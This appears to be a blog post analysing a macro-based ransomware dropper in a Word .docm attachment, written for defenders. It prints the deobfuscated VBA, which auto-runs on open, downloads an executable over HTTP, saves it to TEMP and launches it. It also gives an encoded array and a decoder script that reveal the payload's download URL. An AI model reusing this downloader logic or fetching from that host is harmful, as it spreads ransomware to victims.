Macro Malware Analysis

Malware, in general, is any kind of malicious program which executes on a machine; it can be used for a large variety of purposes such as influence computer behavior, display ads, steal personal informations, take control of remote machines and so on.

Ransomware

Lately a particular category of malware, called ransomware, is spreading aggressively especially through email compaigns. This kind of malicious program infects computers by encrypting files and asking for a ransom payment to recover them; attackers send emails to an extensive number of recepients (mass email attack) in order to infect as much machines as possible.
They tend to use Social Engineering techniques by writing an attractive email subject and text so as to trick users into opening an attachment or a link.
Once the victim opens the downloaded file (which can have different extensions, like “.exe”, “.doc”, “.xls”, “.js”, “.cab”), malware executes and infects the machine by encrypting data with RSA-2048 and AES-128 algorithm. Then, the user gets prompted with a screen asking for money in order to receive the key to restore encrypted data.

Recently, I got my hands on a ransomware variant which exploits Microsoft Office Macro to execute evil code. Of course, this one was attached in an email as a document with “.docm” extension which is the one used for Word documents with macros.
Macros are essentially scripts written in VBA (Visual Basic for Applications), a language used inside Office documents for automating frequent tasks and activities. Since they can interact with the system, attackers can use them as a starting point for the attack.

Macro code deobfuscation

Since we are working with Object Linking and Embedding (OLE), which is a Microsoft proprietary technology for compound documents (like the “.docm” we are threating), one possible way to start analyzing this kind of file is using a very nice utility called oledump: https://blog.didierstevens.com/programs/oledump-py.
This tool allows to extract macro code so we can take a look at the source; we can launch the program and insert as input argument our “.docm” file which I have renamed “malware.docm”:

root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm 
A: word/vbaProject.bin
 A1:       419 'PROJECT'
 A2:        65 'PROJECTwm'
 A3: M   23316 'VBA/Module1'
 A4: M    1347 'VBA/ThisDocument'
 A5:      4445 'VBA/_VBA_PROJECT'
 A6:      1204 'VBA/__SRP_0'
 A7:       106 'VBA/__SRP_1'
 A8:       292 'VBA/__SRP_2'
 A9:       103 'VBA/__SRP_3'
A10:       572 'VBA/dir'

Oledump returns a list of items describing document structure; we are interested in macro code, i.e. items A3 and A4, where tag M indicates the presence of macros. Once we have identified that the interesting portions are “Module1” (looking at the reported dimensions, this should be the core of the script) and “ThisDocument”, we can extract them with the following commands:

root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm -v -s A3 > Module1
root@kali:~/oledump_V0_0_25# ./oledump.py malware.docm -v -s A4 > ThisDocument

We can start by taking a look at “ThisDocument”:

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
SAAKASHVILLI_MUDEN "Rastyag"
End Sub

Immediately, there is something that catches the attention: in the last three lines there is the autoopen() function, which is used for launching macro execution at the opening of the file; this is a first sign of malware activity.
Since there is nothing else here, we can continue the analysis by checking “Module1”. This file is pretty big, but it contains a lot of junk code and uses encryption; this is done for two main reasons: one is to decrease the chances of detection by Antivirus softwares and the other one is to increase difficulty, for a security analyst, of blocking the attack as fast as possible.
The code starts with some variables definitions and here I have reported only the useful ones:

Attribute VB_Name = "Module1"
 
Public InTheAfrikaMountainsAreHighDAcdaw As Object
Public InTheAfrikaMountainsAreHighPLAPEKCwwed As Object
Public InTheAfrikaMountainsAreHighKSKLAL As Object
Public InTheAfrikaMountainsAreHighXSAOO() As String

Public InTheAfrikaMountainsAreHighLAKOPPC As String
Public InTheAfrikaMountainsAreHighPLAPEKC() As String
Public InTheAfrikaMountainsAreHighUUUKA As String

Public InTheAfrikaMountainsAreHighGMAKO As Object
Public InTheAfrikaMountainsAreHigh4 As String
Public InTheAfrikaMountainsAreHigh2 As String
Public InTheAfrikaMountainsAreHighASALLLP As Variant

The attacker alternates junk code taken from the web with his malicious code hidden inside, but with a little work we can find what we are interested in.

Scrolling down the code, there are three portions suggesting there is a basic encryption technique which uses the Replace() function that has been renamed in GodnTeBabenParama():

Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function

InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama("BRREADicroBRRREADoft.XBRREADLHTTPBRRRREADAdodb.BRRREADtrBREADaBRREADBRRRREADBRRREADhBREADll.Appli" _
+ GodnTeBabenParama("cationBRRRREADWBRRREADcript.BRRREADhBREADllBRRRREADProcBREADBRRREADBRRREADBRRRREADGBREADTBRRRREADTBREADBRREADPBRRRREADTypBREADBRRRREADopBREADnBRRRREADwritTRONponBRRREADBREADBodyBRRRREADBRRREADavBREADtofilBREADBRRRREAD", "TRON", "BREADBRRRREADrBREADBRRREAD") _
+ "\zorginBRRREAD.BREADxBREAD", "BREAD", "e")

InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama(InTheAfrikaMountainsAreHigh2, "BRREAD", "M")
InTheAfrikaMountainsAreHigh2 = GodnTeBabenParama(InTheAfrikaMountainsAreHigh2, "BRRREAD", "s")

Lastly, these values are put inside an array by using Split() function:

InTheAfrikaMountainsAreHighPLAPEKC = Split(InTheAfrikaMountainsAreHigh2, "BRRRREAD")

The result of these substitutions gives a lot of informations since the elements of the array are used in important parts of the code:

InTheAfrikaMountainsAreHighPLAPEKC(0) = Microsoft.XMLHTTP
InTheAfrikaMountainsAreHighPLAPEKC(1) = Adodb.streaM
InTheAfrikaMountainsAreHighPLAPEKC(2) = shell.Application
InTheAfrikaMountainsAreHighPLAPEKC(3) = Wscript.shell
InTheAfrikaMountainsAreHighPLAPEKC(4) = Process
InTheAfrikaMountainsAreHighPLAPEKC(5) = GeT
InTheAfrikaMountainsAreHighPLAPEKC(6) = TeMP
InTheAfrikaMountainsAreHighPLAPEKC(7) = Type
InTheAfrikaMountainsAreHighPLAPEKC(8) = open
InTheAfrikaMountainsAreHighPLAPEKC(9) = write
InTheAfrikaMountainsAreHighPLAPEKC(10) = responseBody
InTheAfrikaMountainsAreHighPLAPEKC(11) = savetofile
InTheAfrikaMountainsAreHighPLAPEKC(12) = \zorgins.exe

The last one is really informative since it is the name of an “.exe” file, which is probably the real payload. This means that there should be a part where the file “zorgins.exe” is downloaded and saved to the system.
We can then substitute these values everytime they appear in the code so as to decrypt it (look at the comments):

Set InTheAfrikaMountainsAreHighDAcdaw = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(0)) ' = CreateObject(Microsoft.XMLHTTP)
Set InTheAfrikaMountainsAreHighPLAPEKCwwed = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(1)) ' = CreateObject(Adodb.streaM)
Set InTheAfrikaMountainsAreHighGMAKO = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(2)) ' = CreateObject(shell.Application)
Set InTheAfrikaMountainsAreHigh1DASH1solo = CreateObject(InTheAfrikaMountainsAreHighPLAPEKC(3)) ' = CreateObject(Wscript.shell)
Set InTheAfrikaMountainsAreHighKSKLAL = InTheAfrikaMountainsAreHigh1DASH1solo.Environment(InTheAfrikaMountainsAreHighPLAPEKC(4)) ' = CreateObject(Wscript.shell).Environment(Process)

InTheAfrikaMountainsAreHighLAKOPPC = InTheAfrikaMountainsAreHighKSKLAL(InTheAfrikaMountainsAreHighPLAPEKC(6)) ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)
InTheAfrikaMountainsAreHighUUUKA = InTheAfrikaMountainsAreHighLAKOPPC ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)
InTheAfrikaMountainsAreHighUUUKA = InTheAfrikaMountainsAreHighUUUKA + InTheAfrikaMountainsAreHighPLAPEKC(12) ' = CreateObject(Wscript.shell).Environment(Process)(TeMP)\zorgins.exe
InTheAfrikaMountainsAreHighGMAKO.Open (InTheAfrikaMountainsAreHighUUUKA) ' = CreateObject(shell.Application).Open (CreateObject(Wscript.shell).Environment(Process)(TeMP)\zorgins.exe)

It is clear now that “zorgins.exe” is saved in TEMP directory; moreover in the following snippet we have the HTTP GET request for a url (malware download) which is marked as “InTheAfrikaMountainsAreHigh4”:

InTheAfrikaMountainsAreHighDAcdaw.Open InTheAfrikaMountainsAreHighPLAPEKC(5), InTheAfrikaMountainsAreHigh4, False ' = CreateObject(Microsoft.XMLHTTP).Open GeT, InTheAfrikaMountainsAreHigh4, False
InTheAfrikaMountainsAreHighDAcdaw.Send ' = CreateObject(Microsoft.XMLHTTP).Send

InTheAfrikaMountainsAreHighASALLLP = InTheAfrikaMountainsAreHighDAcdaw.responseBody ' = CreateObject(Microsoft.XMLHTTP).responseBody
InTheAfrikaMountainsAreHighPLAPEKCwwed.Write InTheAfrikaMountainsAreHighASALLLP ' = CreateObject(Adodb.streaM).Write CreateObject(Microsoft.XMLHTTP).responseBody

Moving through the code, there is a strange series of numbers separated by the string “112112112112” and saved in the array “InTheAfrikaMountainsAreHighXSAOO”:

InTheAfrikaMountainsAreHighXSAOO = Split("634411211211211270761121121121127076112112112112683211211211211235381121121121122867112112112112286711211211211272591121121121127259112112112112725911211211211228061121121121126832112112112112695411211211211264051121121121127015112112112112664911211211211259171121121121122745112112112112701511211211211269541121121121126588112112112112280611211211211267101121121121126161112112112112707611211211211228671121121121122928112112112112347711211211211271371121121121126344112112112112341611211211211267101121121121127381", "112112112112")

Taking a look at where this variable is used, we find this interesting function:

Public Function DuBirMahnWeishr(InTheAfrikaMountainsAreHigh6 As Integer) As String
Dost = CInt(InTheAfrikaMountainsAreHighXSAOO(InTheAfrikaMountainsAreHigh6))
DuBirMahnWeishr = Chr(Dost / 61)
End Function

which is then used here:

For apdistance = LBound(InTheAfrikaMountainsAreHighXSAOO) To UBound(InTheAfrikaMountainsAreHighXSAOO)
 InTheAfrikaMountainsAreHigh4 = InTheAfrikaMountainsAreHigh4 & DuBirMahnWeishr(apdistance)
 Next apdistance

It performs a computation by dividing each value of the array “InTheAfrikaMountainsAreHighXSAOO” by 61, converting the value to the corresponding character using function Chr() and saving the results in “InTheAfrikaMountainsAreHigh4”, that is the variable seen before representing malware download url.
Converting the first values we get:

root@kali:~# python
>>> chr(6344/61)
'h'
>>> chr(7076/61)
't'
>>> chr(6832/61)
'p'

This looked promising, so I have written a simple Python script named “decrypt.py” that performs the conversion:

#!/usr/bin/python

encrypted_address = [6344,7076,7076,6832,3538,2867,2867,7259,7259,7259,2806,6832,6954,6405,7015,6649,5917,2745,7015,6954,6588,2806,6710,6161,7076,2867,2928,3477,7137,6344,3416,6710,7381];

characters = [chr(x / 61) for x in encrypted_address]

decrypted_address = ''.join(characters)

print 'Malware download address: ', decrypted_address

After running the script we get the decrypted value:

As I thought, that string was hiding the address used by the macro to download the real payload which is then saved in the temporary directory as “zorgins.exe”; once it executes, it starts encrypting files on the machine.

Sandbox dynamic analysis

As a confirmation of what we have found, we can upload the file on the following website: https://www.hybrid-analysis.com/.
Hybrid Analysis is powered by Payload Security and offers a free service which performs both static and dynamic (behavioral) analysis by interacting with VirusTotal (a free virus, malware and URL online scanning service which uses more than 40 antivirus solutions to execute static analysis), Metadefender (similar to VirusTotal) and running samples in VxStream Sandbox.

Once the analysis is complete it reports results back to the user, showing also screenshots saved during the execution:

As the previous image reports, after the damage has been done, the malware shows the instructions to follow to acquire the decryption key. This can be done by navigating to a website which resides in the Tor network (accessible only by installing Tor software). Once the victim gets there, the attacker requests payment in Bitcoins (a particular currency which is not trackable) and after the money transfer has been done the victim should receive the key to restore documents back to their original state.

Analyzing the report we can verify that informations found during the reverse engineering activity coincide with the results returned after sandbox execution.

Usage of function AutoOpen():

Name of dropped malware and download url including spawned processes:

Going deeper

The analysis performed gives us even more informations such as malicious hosts related to malware download IP address:

This helps us making further analysis: the service reports that even other websites associated to that IP address are flagged as malicious; in fact, from those addresses it is pretty clear the attacker has compromised legitimate sites and he is now using them to host malware and to carry on phishing activities (look for example at Paypal reference on the last url).

Remediation

Once we know the malware download address we can block it by putting the IP address of the website in Firewall/IPS blacklist. A more drastic solution is to create a new rule on the mail server/Antispam blocking all attachments with extension “.docm”.

Anyway for this type of attacks the best defence is awareness: informing users of possible scams like this one is the best countermeasure you can ever implement.